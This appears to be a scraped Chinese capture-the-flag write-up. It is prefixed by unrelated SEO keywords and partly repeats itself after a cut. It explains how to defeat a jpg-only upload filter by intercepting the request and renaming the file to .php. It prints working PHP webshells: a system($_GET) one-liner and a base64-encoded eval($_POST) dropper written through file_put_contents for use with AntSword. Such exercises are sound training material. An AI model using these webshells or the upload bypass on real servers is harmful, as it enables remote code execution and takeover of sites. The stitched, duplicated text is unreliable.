网站建设项目数,网页跳转到其它网站,外贸网站价格,如何做自媒体打开是这么个页面 左上角找到Admin访问 里面有个Add Users#xff0c;访问一下#xff0c;能创建用户#xff0c;有个能上传图片的地方 普通的一句话木马无法访问flag#xff0c;需要创建一个权限马
?php system($_GET[1]);phpinfo();?
因为只能上传jpg形式的文…打开是这么个页面 左上角找到Admin访问 里面有个Add Users访问一下能创建用户有个能上传图片的地方 普通的一句话木马无法访问flag需要创建一个权限马
?php system($_GET[1]);phpinfo();?
因为只能上传jpg形式的文件所以更改文件后缀名为jpg
使用bp抓包更改后缀为php使用重放器发送 上传成功 访问img/上传的php文件名 /flag得到flagflag{a71683b4-9a2d-4288-b8f3-25d10816b1c0} 第二种方法使用蚁剑马连接 一句话木马是有防护的所以我们要利用php和base64来构造一个特殊马来进行连接
base64先对一句话木马加密?php eval($_POST[a]);? 木马内容
?php file_put_contents(shell.php,base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8)); ?
然后跟上边一样bp抓包改包重放器发送 生成shell.php文件木马是以base64的形式。
蚁剑路径为img/shell.php编码器为base6根目录下找到flag
